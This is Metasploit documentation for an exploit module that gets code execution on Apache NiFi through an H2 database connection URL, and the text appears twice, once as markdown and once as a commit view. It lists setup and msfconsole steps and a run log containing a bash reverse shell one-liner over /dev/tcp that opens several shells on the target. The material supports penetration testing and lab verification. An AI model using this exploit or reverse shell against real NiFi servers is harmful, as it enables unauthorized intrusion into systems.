documentation/modules/exploit/linux/http/apache_nifi_h2_rce.md

## Vulnerable Application

The DBCPConnectionPool and HikariCPConnectionPool Controller Services in
Apache NiFi 0.0.2 through 1.21.0 allow an authenticated and authorized user
to configure a Database URL with the H2 driver that enables custom code execution.
This exploit will create a new ExecuteSQL process, connect it to a DB Connection
Pool, and create a new H2 based connection.  The connection is able to create
a new memory based h2 database on the fly, with a code execution inlined that
executes when the H2 connection, and process are started.

This exploit will result in several shells (5-7).
Successfully tested against Apache nifi 1.16.0 through 1.21.0.

### Vulnerable Docker Images

Docker images are available, and exploitable in the default configuration.

```
docker run -p 8443:8443 apache/nifi:1.20.0
```

After the image runs for a minute or two, you'll need to grab a set of credentials
by running grep against the logs:

```
docker logs [container_id] | grep Generated
```

## Verification Steps

1. Install the application
1. Start msfconsole
1. Do: `use exploit/linux/http/apache_nifi_h2_rce `
1. Do: `set username [username]`
1. Do: `set password [password]`
1. Do: `set rhosts [ip]`
1. Do: `set lhost [ip]`
1. Do: `run`
1. You should get a shell.

## Options

### DELAY

The delay time before stopping and deleting the processor and DB connection pool. Defaults to `15`

## Scenarios

### Nifi 1.20.0 on Docker

```
msf6 > use exploit/linux/http/apache_nifi_h2_rce 
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(linux/http/apache_nifi_h2_rce) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf6 exploit(linux/http/apache_nifi_h2_rce) > set lhost 1.1.1.1
lhost => 1.1.1.1
msf6 exploit(linux/http/apache_nifi_h2_rce) > set username 4b6caac4-e1c6-431d-8e63-f014a6541362
username => 4b6caac4-e1c6-431d-8e63-f014a6541362
msf6 exploit(linux/http/apache_nifi_h2_rce) > set password E3ke7kCROjBabztg0acFemg5xk2QiQs1
password => E3ke7kCROjBabztg0acFemg5xk2QiQs1
msf6 exploit(linux/http/apache_nifi_h2_rce) > set verbose true
verbose => true
msf6 exploit(linux/http/apache_nifi_h2_rce) > exploit

[+] bash -c '0<&126-;exec 126<>/dev/tcp/1.1.1.1/4444;sh <&126 >&126 2>&126'
[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. Apache NiFi instance supports logins and vulnerable version detected: 1.20.0
[+] Retrieved process group: c34bfd91-0189-1000-a1ab-44dda04d471e
[+] Created processor c34ccd20-0189-1000-5ee2-06eb40644237 in process group c34bfd91-0189-1000-a1ab-44dda04d471e
[+] Configured processor c34ccd20-0189-1000-5ee2-06eb40644237
[+] Configured db connection pool rkkIaE (c34cccc4-0189-1000-22c2-9fa3bb57d87b)
[+] Enabling db connection pool
[+] Starting processor
[*] Command shell session 1 opened (1.1.1.1:4444 -> 172.17.0.2:49468) at 2023-08-04 21:25:44 -0400
[*] Waiting 15 seconds before stopping and deleting
[*] Command shell session 2 opened (1.1.1.1:4444 -> 172.17.0.2:49470) at 2023-08-04 21:25:45 -0400
[*] Command shell session 3 opened (1.1.1.1:4444 -> 172.17.0.2:49478) at 2023-08-04 21:25:46 -0400
[*] Command shell session 4 opened (1.1.1.1:4444 -> 172.17.0.2:49488) at 2023-08-04 21:25:49 -0400
[*] Command shell session 6 opened (1.1.1.1:4444 -> 172.17.0.2:54526) at 2023-08-04 21:25:50 -0400
[*] Command shell session 7 opened (1.1.1.1:4444 -> 172.17.0.2:54534) at 2023-08-04 21:25:51 -0400
[+] Stopped and terminated processor c34ccd20-0189-1000-5ee2-06eb40644237
[*] Found newer revision of c34ccd20-0189-1000-5ee2-06eb40644237, attempting to delete version 4
[+] Deleted processor c34ccd20-0189-1000-5ee2-06eb40644237
[+] Disabled db connection pool c34cccc4-0189-1000-22c2-9fa3bb57d87b, sleeping 15 seconds to allow the connection to finish disabling
[*] Found newer revision of c34cccc4-0189-1000-22c2-9fa3bb57d87b, attempting to delete version 1
[*] Found newer revision of c34cccc4-0189-1000-22c2-9fa3bb57d87b, attempting to delete version 2
[*] Found newer revision of c34cccc4-0189-1000-22c2-9fa3bb57d87b, attempting to delete version 3
[*] Found newer revision of c34cccc4-0189-1000-22c2-9fa3bb57d87b, attempting to delete version 4
[+] Deleted db connection pool c34cccc4-0189-1000-22c2-9fa3bb57d87b

id
uid=1000(nifi) gid=1000(nifi) groups=1000(nifi)
uname -a
Linux 06967477694d 6.3.0-kali1-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.3.7-1kali1 (2023-06-29) x86_64 x86_64 x86_64 GNU/Linux
```
apache nifi h2 rce 2023-08-04 21:29:11 -04:00			`## Vulnerable Application`

			`The DBCPConnectionPool and HikariCPConnectionPool Controller Services in`
			`Apache NiFi 0.0.2 through 1.21.0 allow an authenticated and authorized user`
			`to configure a Database URL with the H2 driver that enables custom code execution.`
			`This exploit will create a new ExecuteSQL process, connect it to a DB Connection`
			`Pool, and create a new H2 based connection. The connection is able to create`
			`a new memory based h2 database on the fly, with a code execution inlined that`
			`executes when the H2 connection, and process are started.`

			`This exploit will result in several shells (5-7).`
			`Successfully tested against Apache nifi 1.16.0 through 1.21.0.`

			`### Vulnerable Docker Images`

			`Docker images are available, and exploitable in the default configuration.`

			```
			`docker run -p 8443:8443 apache/nifi:1.20.0`
			```

			`After the image runs for a minute or two, you'll need to grab a set of credentials`
			`by running grep against the logs:`

			```
			`docker logs [container_id] \| grep Generated`
			```

			`## Verification Steps`

			`1. Install the application`
			`1. Start msfconsole`
			1. Do: `use exploit/linux/http/apache_nifi_h2_rce `
			1. Do: `set username [username]`
			1. Do: `set password [password]`
			1. Do: `set rhosts [ip]`
			1. Do: `set lhost [ip]`
			1. Do: `run`
			`1. You should get a shell.`

			`## Options`

			`### DELAY`

			The delay time before stopping and deleting the processor and DB connection pool. Defaults to `15`

			`## Scenarios`

			`### Nifi 1.20.0 on Docker`

			```
			`msf6 > use exploit/linux/http/apache_nifi_h2_rce`
			`[*] Using configured payload cmd/unix/reverse_bash`
			`msf6 exploit(linux/http/apache_nifi_h2_rce) > set rhosts 127.0.0.1`
			`rhosts => 127.0.0.1`
			`msf6 exploit(linux/http/apache_nifi_h2_rce) > set lhost 1.1.1.1`
			`lhost => 1.1.1.1`
			`msf6 exploit(linux/http/apache_nifi_h2_rce) > set username 4b6caac4-e1c6-431d-8e63-f014a6541362`
			`username => 4b6caac4-e1c6-431d-8e63-f014a6541362`
			`msf6 exploit(linux/http/apache_nifi_h2_rce) > set password E3ke7kCROjBabztg0acFemg5xk2QiQs1`
			`password => E3ke7kCROjBabztg0acFemg5xk2QiQs1`
			`msf6 exploit(linux/http/apache_nifi_h2_rce) > set verbose true`
			`verbose => true`
			`msf6 exploit(linux/http/apache_nifi_h2_rce) > exploit`

			`[+] bash -c '0<&126-;exec 126<>/dev/tcp/1.1.1.1/4444;sh <&126 >&126 2>&126'`
			`[*] Started reverse TCP handler on 1.1.1.1:4444`
			`[*] Running automatic check ("set AutoCheck false" to disable)`
			`[!] The service is running, but could not be validated. Apache NiFi instance supports logins and vulnerable version detected: 1.20.0`
			`[+] Retrieved process group: c34bfd91-0189-1000-a1ab-44dda04d471e`
			`[+] Created processor c34ccd20-0189-1000-5ee2-06eb40644237 in process group c34bfd91-0189-1000-a1ab-44dda04d471e`
			`[+] Configured processor c34ccd20-0189-1000-5ee2-06eb40644237`
			`[+] Configured db connection pool rkkIaE (c34cccc4-0189-1000-22c2-9fa3bb57d87b)`
			`[+] Enabling db connection pool`
			`[+] Starting processor`
			`[*] Command shell session 1 opened (1.1.1.1:4444 -> 172.17.0.2:49468) at 2023-08-04 21:25:44 -0400`
			`[*] Waiting 15 seconds before stopping and deleting`
			`[*] Command shell session 2 opened (1.1.1.1:4444 -> 172.17.0.2:49470) at 2023-08-04 21:25:45 -0400`
			`[*] Command shell session 3 opened (1.1.1.1:4444 -> 172.17.0.2:49478) at 2023-08-04 21:25:46 -0400`
			`[*] Command shell session 4 opened (1.1.1.1:4444 -> 172.17.0.2:49488) at 2023-08-04 21:25:49 -0400`
			`[*] Command shell session 6 opened (1.1.1.1:4444 -> 172.17.0.2:54526) at 2023-08-04 21:25:50 -0400`
			`[*] Command shell session 7 opened (1.1.1.1:4444 -> 172.17.0.2:54534) at 2023-08-04 21:25:51 -0400`
			`[+] Stopped and terminated processor c34ccd20-0189-1000-5ee2-06eb40644237`
			`[*] Found newer revision of c34ccd20-0189-1000-5ee2-06eb40644237, attempting to delete version 4`
			`[+] Deleted processor c34ccd20-0189-1000-5ee2-06eb40644237`
			`[+] Disabled db connection pool c34cccc4-0189-1000-22c2-9fa3bb57d87b, sleeping 15 seconds to allow the connection to finish disabling`
			`[*] Found newer revision of c34cccc4-0189-1000-22c2-9fa3bb57d87b, attempting to delete version 1`
			`[*] Found newer revision of c34cccc4-0189-1000-22c2-9fa3bb57d87b, attempting to delete version 2`
			`[*] Found newer revision of c34cccc4-0189-1000-22c2-9fa3bb57d87b, attempting to delete version 3`
			`[*] Found newer revision of c34cccc4-0189-1000-22c2-9fa3bb57d87b, attempting to delete version 4`
			`[+] Deleted db connection pool c34cccc4-0189-1000-22c2-9fa3bb57d87b`

			`id`
			`uid=1000(nifi) gid=1000(nifi) groups=1000(nifi)`
			`uname -a`
			`Linux 06967477694d 6.3.0-kali1-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.3.7-1kali1 (2023-06-29) x86_64 x86_64 x86_64 GNU/Linux`
			```